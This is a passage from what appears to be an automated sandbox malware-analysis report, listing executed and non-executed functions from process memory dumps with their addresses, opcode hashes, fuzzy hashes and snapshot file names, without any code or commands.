                                      • Opcode ID: 4bac09f003946da5670d2bdc14cee15ad1f3e6d9279e53449faeed852259b4c9
                                      • Instruction ID: cb6c613c69de1a1fd4e950a743fad0072bf887ab0113596b6459cf5a79695f97
                                      • Opcode Fuzzy Hash: 4bac09f003946da5670d2bdc14cee15ad1f3e6d9279e53449faeed852259b4c9
                                      • Instruction Fuzzy Hash: EF017131D5D6894FE752AB78885A5A97BE0FF49340F1609F7D908CB0A3EA2CA884C701
                                      Function 00007FF886ED280D Relevance: .0, Instructions: 44COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1537157709.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ff886ed0000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6fd5b5af277883329eb2d28d2ac0dccdbccf7a19e244dbc70172607ea07f8040
                                      • Instruction ID: e17cd519c82e137246d77da288008320082d10a7c6f4a2746e85b8917aa0b010
                                      • Opcode Fuzzy Hash: 6fd5b5af277883329eb2d28d2ac0dccdbccf7a19e244dbc70172607ea07f8040
                                      • Instruction Fuzzy Hash: CD018B74D1864E8FEB91EB68848D7B97BE0FF59341F1545BAD808C60A2EA38E584C701
                                      Function 00007FF886EE7C59 Relevance: .0, Instructions: 43COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1537157709.00007FF886EE4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE4000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ff886ee4000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 89600e140819627dbf9f9ef3072b6d41e855479af1d3a544dcffc8976317bf58
                                      • Instruction ID: 84957ea82c1636413e7efddbcd0efca31d3b5aab1338b0c1bc31f9916c3b03a2
                                      • Opcode Fuzzy Hash: 89600e140819627dbf9f9ef3072b6d41e855479af1d3a544dcffc8976317bf58
                                      • Instruction Fuzzy Hash: 12018430E1D68A8FEB52AB7884991A97BE4FF49340F1509F2D508CB0A2DA28A844C712
                                      Function 00007FF886EE831D Relevance: .0, Instructions: 43COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1537157709.00007FF886EE4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE4000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ff886ee4000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5f3f46fab3c70bbb508f8835fe6f48e160c0ea0f280670cc5ccdf4d0fd465dae
                                      • Instruction ID: 127eb7fd8f26274b2e008ce58c64181bab20bc1ac3bbf0cefc3118cc3adf9237
                                      • Opcode Fuzzy Hash: 5f3f46fab3c70bbb508f8835fe6f48e160c0ea0f280670cc5ccdf4d0fd465dae
                                      • Instruction Fuzzy Hash: 3101D430D596498FDB88EB64C46D2BE7BA0FF49340F5404BED40ACA192DE39A950C711
                                      Function 00007FF886EDB089 Relevance: .0, Instructions: 43COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1537157709.00007FF886ED9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED9000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ff886ed9000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5f6824427eb6445b2cc83e6c7e7d5a380316475d761f082e1568c3768127ce77
                                      • Instruction ID: 8b43c301dc6a4a2be54fb2377534a597d30d0f24f5dc1dd013e5c7f92cd4178d
                                      • Opcode Fuzzy Hash: 5f6824427eb6445b2cc83e6c7e7d5a380316475d761f082e1568c3768127ce77
                                      • Instruction Fuzzy Hash: 7A01A27091D64A9FE742EB7888596A97BF1FF09380F5549F6D418C70A3FE38A944C702
                                      Function 00007FF886EDAF3B Relevance: .0, Instructions: 42COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1537157709.00007FF886ED9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED9000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ff886ed9000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6c6a4bfa21efba8d892a5645607d555e8db41be121aa6e95a694f86249a75d86
                                      • Instruction ID: 2364dff17c4115067b9defa4c7d946857a07b779422368d4dd7f2d5055fcd815
                                      • Opcode Fuzzy Hash: 6c6a4bfa21efba8d892a5645607d555e8db41be121aa6e95a694f86249a75d86
                                      • Instruction Fuzzy Hash: 7B016D7091850E9EEB58EF2CC4692B977A0FF18341F2008BED40EC6092DE75AA50C701
                                      Function 00007FF886ED0610 Relevance: .0, Instructions: 42COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1537157709.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ff886ed0000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ebf77a157c3fd967808c5ec2d5da589520d56c2da0122e6399358fb0ed74d14f
                                      • Instruction ID: f9537640c1ba5231fe7ea78dd020ecf4bc2e522d31fa8ef322b43cf66f9b0f2d
                                      • Opcode Fuzzy Hash: ebf77a157c3fd967808c5ec2d5da589520d56c2da0122e6399358fb0ed74d14f
                                      • Instruction Fuzzy Hash: F501313091850EAFEB68EB68C4596B977E0FF18345F60087ED41EC61D2DE39A990C611
                                      Function 00007FF886ED0608 Relevance: .0, Instructions: 42COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1537157709.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ff886ed0000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 681ac945a8b7d5f5d612ee1aec1c76ced406da19b68eb68917d033ab7623fe85
                                      • Instruction ID: fee511ce182148a18523f624715144315859d11be7f51d6a3383cc8edf5ceb8d
                                      • Opcode Fuzzy Hash: 681ac945a8b7d5f5d612ee1aec1c76ced406da19b68eb68917d033ab7623fe85
                                      • Instruction Fuzzy Hash: 3901313095450EAEEBA8EB68C4592B977A0FF18345F60087ED41EC61D2DE39A550C641
                                      Function 00007FF886ED1140 Relevance: .0, Instructions: 41COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1537157709.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ff886ed0000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2c4270f17b4f72fb9dbb129ad3ba8183a422f9a69f02bdd7a4ff9d5402ab49b2
                                      • Instruction ID: e37c3e3672d302c4953097e265c8819e0362ae79edc24a60c63d11b92c9b4eb6
                                      • Opcode Fuzzy Hash: 2c4270f17b4f72fb9dbb129ad3ba8183a422f9a69f02bdd7a4ff9d5402ab49b2
                                      • Instruction Fuzzy Hash: 76F0AF70D18A1E8AFB989BAC98583FA77E0FF66391F10067AD41AC61C2DE241958C641
                                      Function 00007FF886EDB508 Relevance: .0, Instructions: 40COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1537157709.00007FF886ED9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED9000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ff886ed9000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7214c3f7d6f5d0f85af5dca6042705bda55a6047fc2d0494f3bd88aad50f7e0a
                                      • Instruction ID: ca48122b1390b52945c1789a1819928d9b5d92e7ca45aa80b3900dcdcee6dce0
                                      • Opcode Fuzzy Hash: 7214c3f7d6f5d0f85af5dca6042705bda55a6047fc2d0494f3bd88aad50f7e0a
                                      • Instruction Fuzzy Hash: 530144B0E1891E9EE741EB7CC44D6BA76E2FF58345F6048B5D41DC7196EE38B484CA01
                                      Function 00007FF886ED1C6D Relevance: .0, Instructions: 40COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1537157709.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ff886ed0000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f2680e9ceead2dd6da9956ebc38fbdcea20664178861da4a554842086d7e9697
                                      • Instruction ID: ac2eddc4b8ff406a66cb308c23fdc74372f9d81608dfca3c08be9bd9eb3c42f2
                                      • Opcode Fuzzy Hash: f2680e9ceead2dd6da9956ebc38fbdcea20664178861da4a554842086d7e9697
                                      • Instruction Fuzzy Hash: 7FF08C30909A4E8FEB99DF288859AFA77A0FF55345F60057AE819C6192CB39E850CB40
                                      Function 00007FF886ED05D0 Relevance: .0, Instructions: 39COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1537157709.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ff886ed0000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ee1c9facee2ca88b6342a3bc7bc2027584646fd8ac8858cc634ca9f14832eb1b
                                      • Instruction ID: 5e57666e62cd18069597734d40642dcf2900f3be3e3a7b92e3163f2918a05a37
                                      • Opcode Fuzzy Hash: ee1c9facee2ca88b6342a3bc7bc2027584646fd8ac8858cc634ca9f14832eb1b
                                      • Instruction Fuzzy Hash: ABF0F03091960E8FEB99EF2894452FA37A0FF15344F60053AE80DC7182CB39E8A0CB81
                                      Function 00007FF886EE7D8A Relevance: .0, Instructions: 38COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1537157709.00007FF886EE4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE4000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ff886ee4000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7566a65ce41940427387955aac0e7f139b0b57692203b0081528a46e4fe278d0
                                      • Instruction ID: 9bbe1458e246601564384d4c373760fb14b0c89b9f9084aabf967dca4402890d
                                      • Opcode Fuzzy Hash: 7566a65ce41940427387955aac0e7f139b0b57692203b0081528a46e4fe278d0
                                      • Instruction Fuzzy Hash: D901EE74D0861A8FEF64EF94D4946ECBAB1FB18361F24016ED009E2291DB386988CB25
                                      Function 00007FF886ED2729 Relevance: .0, Instructions: 35COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1537157709.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ff886ed0000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c9ea8180432437446478f9baa514fd6347778686a6304b6c3dd51d474ca2729f
                                      • Instruction ID: 7546c906aad585d8a0dd0a21b8e2f18813a0a0b07e88956874a77f18f9b87990
                                      • Opcode Fuzzy Hash: c9ea8180432437446478f9baa514fd6347778686a6304b6c3dd51d474ca2729f
                                      • Instruction Fuzzy Hash: ABF0C83180D3899FDB659F2484252A93B60FF05340F5504BED449C60D3DA3C9854C741
                                      Function 00007FF886EE1470 Relevance: .0, Instructions: 32COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1537157709.00007FF886EE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ff886ee1000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0447b79281b8074d6891f04e342cdbdd5c91919d66f0023f7fd0fc0590156aa2
                                      • Instruction ID: 7b5797627245b8f1c101049567410d2467ae9a3eda0377c8cae0442e7d02e34e
                                      • Opcode Fuzzy Hash: 0447b79281b8074d6891f04e342cdbdd5c91919d66f0023f7fd0fc0590156aa2
                                      • Instruction Fuzzy Hash: 6CF0FE70D1455E8EEB94EF6898182FE77A4FF18305F50053BE81DC2291EB345594C651
                                      Function 00007FF886ED279D Relevance: .0, Instructions: 31COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1537157709.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ff886ed0000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5c9a1f98ac24e19ba2e3ae15f3eeaba662ed23d5093254c6ab9e1cd6f403daeb
                                      • Instruction ID: 40327963e551d2ddae569dbefb565386d5602c8fadc95ba7007732e15d1d72e1
                                      • Opcode Fuzzy Hash: 5c9a1f98ac24e19ba2e3ae15f3eeaba662ed23d5093254c6ab9e1cd6f403daeb
                                      • Instruction Fuzzy Hash: 0BF0243081E78A8FEB689F28842A2B93BA0FF05314F0404BEE509C60D3DB3D9850C301
                                      Function 00007FF886ED23CE Relevance: .0, Instructions: 22COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1537157709.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ff886ed0000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 34f51b4e931255b8e8f405a01ab11ad91d7b836dd6515934a5e5c302054a0cca
                                      • Instruction ID: ac54cb65d350466c33ff5c37ed4e69759a8bca49b465f212bef2eeff336c4a6e
                                      • Opcode Fuzzy Hash: 34f51b4e931255b8e8f405a01ab11ad91d7b836dd6515934a5e5c302054a0cca
                                      • Instruction Fuzzy Hash: 60F0153090851ACEEB64EF14C849BED73A0FB50341F2005BAC00ED22A2CE782E84CB40
                                      Function 00007FF886EE1D23 Relevance: .0, Instructions: 10COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1537157709.00007FF886EE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ff886ee1000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1c3793899e74988778d620f26c1e6b94808694aef74b3bdca11a110d8a4c849c
                                      • Instruction ID: 805c8ac2244c1e409037d90ecea76f7b85daba154eb5b6794332551378a9b6a6
                                      • Opcode Fuzzy Hash: 1c3793899e74988778d620f26c1e6b94808694aef74b3bdca11a110d8a4c849c
                                      • Instruction Fuzzy Hash: EBD012B0C0862D8BDF00DFA0CC10AEE73B1BF10340F000566900AAB2C5CBB86948CB51

                                      Non-executed Functions

                                      Function 00007FF886EE1597 Relevance: 11.5, Strings: 9, Instructions: 240COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1537157709.00007FF886EE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ff886ee1000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: !$"$#$+$-$/$[${$}
                                      • API String ID: 0-3989209503
                                      • Opcode ID: 6d69f1c575fa24a89efaa86438dd4f00321fa4af7925690356c0dd8bd8ebce08
                                      • Instruction ID: 38bf1e27ccb928f26d741cd526bd30adfa94575ddc1e5a897dc569b4052b0e2a
                                      • Opcode Fuzzy Hash: 6d69f1c575fa24a89efaa86438dd4f00321fa4af7925690356c0dd8bd8ebce08
                                      • Instruction Fuzzy Hash: F1B1C370D082298FEBA8DF54D8987EDB7B1BF49341F2045B9D04EA6281CB386E85CF51

                                      Executed Functions

                                      Function 00007FF886EB3545 Relevance: 1.5, Strings: 1, Instructions: 266COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886eb0000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Y_H
                                      • API String ID: 0-219585648
                                      • Opcode ID: 5bc2cab24bad64406eebf7e6f5d140620b21e691b747dbf529aec43393143508
                                      • Instruction ID: 42046e40def8362242631f4afa73851ee9ad35e83fb3c9b7340226a4c80dd4f8
                                      • Opcode Fuzzy Hash: 5bc2cab24bad64406eebf7e6f5d140620b21e691b747dbf529aec43393143508
                                      • Instruction Fuzzy Hash: D291C271E289498FEB94DB68D8593E9BBE1FB6A350F54017AC00DE72C6DF685801C741
                                      Function 00007FF886EC1EAA Relevance: 2.6, Strings: 2, Instructions: 56COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EC1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EC1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886ec1000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: "$/
                                      • API String ID: 0-2662438755
                                      • Opcode ID: 27808042ac56fb1295fff866c786a87f9b6098f26371e97d393223ff10598d9b
                                      • Instruction ID: 9d5bbb2a644bb11f9bacca212ad0b6e6330e365b935f5ead03fb3507191ce6af
                                      • Opcode Fuzzy Hash: 27808042ac56fb1295fff866c786a87f9b6098f26371e97d393223ff10598d9b
                                      • Instruction Fuzzy Hash: 85210834D0462D8BDB68CF94C8647EDB3B2BF95340F1482AAD00AAB2C4DB745E84DF41
                                      Function 00007FF886EC2D4D Relevance: 1.4, Strings: 1, Instructions: 119COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EC1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EC1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886ec1000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: UWVH
                                      • API String ID: 0-545401801
                                      • Opcode ID: c4c5bd99355fa923bf8db5a4f22df26fe750f4425c021b9720441f756e245a71
                                      • Instruction ID: 13ad97d6e64a74688db743690e05135a21e15db2a221be508c75118e54cbb031
                                      • Opcode Fuzzy Hash: c4c5bd99355fa923bf8db5a4f22df26fe750f4425c021b9720441f756e245a71
                                      • Instruction Fuzzy Hash: 3441F970A2461E8FEB84EB98D85A6EDB7B1FF58340F540579E409E7292CE386841CB41
                                      Function 00007FF886EC599B Relevance: 1.3, Strings: 1, Instructions: 12COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EC4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EC4000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886ec4000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: H|{
                                      • API String ID: 0-2800150826
                                      • Opcode ID: e1851261a8e7c44ca1f7d376783575787842fb0ac87dac7faeee6834786a7c50
                                      • Instruction ID: eba4a515d66b3f796083e4f78fc819eee947238ae36a32991b4a5f1fd688235f
                                      • Opcode Fuzzy Hash: e1851261a8e7c44ca1f7d376783575787842fb0ac87dac7faeee6834786a7c50
                                      • Instruction Fuzzy Hash: 55D0C971C19A0ACFE6A4DA18844E3A9BBF1FF54740B54006AD408A2142DF201852DB01
                                      Function 00007FF886EB0515 Relevance: .4, Instructions: 388COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886eb0000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fe2fbd040911f6413725c3723afe3563915c53dc1fca11c5935fe193411900bd
                                      • Instruction ID: 46da97bfff9c85499692a2a209e2050eb6566326d769298eaa5592b13377f8eb
                                      • Opcode Fuzzy Hash: fe2fbd040911f6413725c3723afe3563915c53dc1fca11c5935fe193411900bd
                                      • Instruction Fuzzy Hash: 5CB12607E0D6D24EE21176ACB8592F97F90FF922A5B1C81B7D08C9E0D7DD18AC4AC295
                                      Function 00007FF886EB05A0 Relevance: .3, Instructions: 316COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886eb0000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9556d8eacc547ddee0ff391c7263931c761df9680f19a2adcefbdbe7b902c476
                                      • Instruction ID: 64b8cd2facba43180e62a5798fb5c8b1c61fa3e6e61e8d4afc19949f2f9aebd5
                                      • Opcode Fuzzy Hash: 9556d8eacc547ddee0ff391c7263931c761df9680f19a2adcefbdbe7b902c476
                                      • Instruction Fuzzy Hash: 38912803E0D6D24EE21166BCB8592F96F90FF912A5F1C81B7D08CAE0D7DD18AC4AC295
                                      Function 00007FF886EB05ED Relevance: .3, Instructions: 306COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886eb0000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0b3deed561b7c75fb03de71d8dbce39860de39346d3c6cfb980acd7cf57868bd
                                      • Instruction ID: 9751d4342a94016a54ef93e1b25aefe8eface09f826a788b8da2be75e56adb45
                                      • Opcode Fuzzy Hash: 0b3deed561b7c75fb03de71d8dbce39860de39346d3c6cfb980acd7cf57868bd
                                      • Instruction Fuzzy Hash: 60912712E0D6D24FE21166BCB8592F97F90FF922A1B1C81F7D0889E0D7DD18AC4AC395
                                      Function 00007FF886EB16B8 Relevance: .3, Instructions: 285COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886eb0000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 952cacd90d23d99c8bd64da47c7fe90538f8da8ee5ee6b153237ad173f24c8d7
                                      • Instruction ID: 932d674c3ec7b0efc881c18e2f7f0b770b118fa3143ce4f840cd120cc55dc890
                                      • Opcode Fuzzy Hash: 952cacd90d23d99c8bd64da47c7fe90538f8da8ee5ee6b153237ad173f24c8d7
                                      • Instruction Fuzzy Hash: A881BE31A1CA498BDB58DE1C98956B977E2FFD8750F28017ED44ED3286DE34AC02C781
                                      Function 00007FF886EB0640 Relevance: .3, Instructions: 267COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886eb0000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ed830c267192e22b6fc98651a1685c4a4e0d3812f6d24bae5c0adc1771c64002
                                      • Instruction ID: 643f0fdc5cf5cfaa5a7fd3892a708f21d9ad24afdcd7868be6cd0b60410e01c6
                                      • Opcode Fuzzy Hash: ed830c267192e22b6fc98651a1685c4a4e0d3812f6d24bae5c0adc1771c64002
                                      • Instruction Fuzzy Hash: 3F711912E0D6D14FE21166BCB8592F96F90FF912A1F1C81F7D0899E0DBDC58AC4AC295
                                      Function 00007FF886EB0638 Relevance: .2, Instructions: 190COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886eb0000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: be9842fc13542e35f4f32ba56046e47fce3f0b2bca9fd1078a34e8b318d9d2f0
                                      • Instruction ID: 3f30107b863401dbec20e3c3748d4395438a1019c9fff694adbb9adf4086799d
                                      • Opcode Fuzzy Hash: be9842fc13542e35f4f32ba56046e47fce3f0b2bca9fd1078a34e8b318d9d2f0
                                      • Instruction Fuzzy Hash: D3512812E1D6924FE31166BCA8592E57FA0FF513A0F1C81B7D088EA0D7DD18AC4AC391
                                      Function 00007FF886EB1CED Relevance: .2, Instructions: 189COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886eb0000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4d193ebf66b2a6687fcf82214f080bd1b4824194ee74c29b373ae35a7aab4118
                                      • Instruction ID: f0e39d49e56a9bdc4502a13fcf2ec0513fd26acd807234ed635d6c5649c9cafe
                                      • Opcode Fuzzy Hash: 4d193ebf66b2a6687fcf82214f080bd1b4824194ee74c29b373ae35a7aab4118
                                      • Instruction Fuzzy Hash: DD51E131A18B894FDB59DE1888956BA77E2FFD8751B28417ED44ED7281CE34EC02CB81
                                      Function 00007FF886EC4000 Relevance: .2, Instructions: 163COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EC4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EC4000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886ec4000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3de81a39bb0554aea6b533b8ed940d4cd37b8d636eb2a5e49601486f8a3e3854
                                      • Instruction ID: 37357ae98214dd9c742ee74e0f24759efece177651f13f48f24a94efb5a0888b
                                      • Opcode Fuzzy Hash: 3de81a39bb0554aea6b533b8ed940d4cd37b8d636eb2a5e49601486f8a3e3854
                                      • Instruction Fuzzy Hash: 0D416C237186569FD311B7ACFC595EE7BA0EF803B1B044477D58CCB053DA28A84AC7A1
                                      Function 00007FF886EB31A5 Relevance: .1, Instructions: 147COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB0000, based on PE: false
